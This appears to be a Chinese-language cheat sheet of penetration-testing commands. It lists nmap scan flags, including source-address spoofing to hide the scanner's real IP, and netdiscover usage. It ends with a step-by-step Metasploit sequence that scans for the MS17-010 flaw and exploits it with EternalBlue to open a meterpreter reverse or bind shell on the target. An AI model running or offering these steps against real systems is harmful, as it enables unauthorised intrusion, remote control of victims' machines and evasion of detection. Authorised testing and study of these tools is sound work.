Nmap扫描
扫描一个段的主机在线状况(进行ping扫描)
nmap -sP -T4 172.10.22.1/24 | grep Nmap | cut -d "(" -f 2 |cut -d ")" -f 1
相关扫描命令:
-T4: 快速扫描(可以加快执行速度)
-sn:Ping扫描, 不进行端口扫描(-sn被称为-sP)
-sA: 发送tcp的ack包进行探测,可以探测主机是否存活
-sS: 半开放扫描(半开扫描,很少有系统能把它记入系统日志,非3次握手的tcp扫描)
-sT:3次握手方式tcp的扫描,慢
-sU:udp端口的扫描
-sF:也是tcp的扫描一种,发送一个FIN标志的数据包
-sV:版本检测(sV)
-Pn: 跳过主机发现,进行深入扫描(防止主机过滤ping扫描,可直接进行端口扫描)
-O: 操作系统检测
-A: 参数,综合扫描。比较慢,不推荐
-e: 指定网络接口,扫描时使用哪个网卡
nmap -e eth0 192.168.1.1/24
-S: 可以伪装源地址进行扫描。这样好处在于不会被对方发现自己的真实IP
nmap -e eth0 192.168.1.53 -S 10.0.1.167 -Pn
netdiscover
netdiscover [通用选项] [ip]
netdiscover -r 192.168.0.1/24
-p :被动扫描(贼慢)
Metasploit
启动数据库
service postgresql start
查看是否连接数据库
service postgresql status
启动Metasploit(msfconsole模式下)
msfconsole -q
更新metasploit
msfupdate
例子
search ms17
1、使用扫描模块
查看是否存在漏洞(存在前面一个+)
use auxiliary/scanner/smb/smb_ms17_010
option
set rhosts x.x.x.x
or set rhosts x.x.x.x/24
run
运行
2、使用攻击模块
use exploit/windows/smb/ms17_010_eternalblue
option(or info)查看参数
set rhost x.x.x.x
这需要路由器开放端口,才能返弹
set payload windows/x64/meterpreter/reverse_tcp
这直接绑定
set payload windows/x64/meterpreter/bind_tcp
run
运行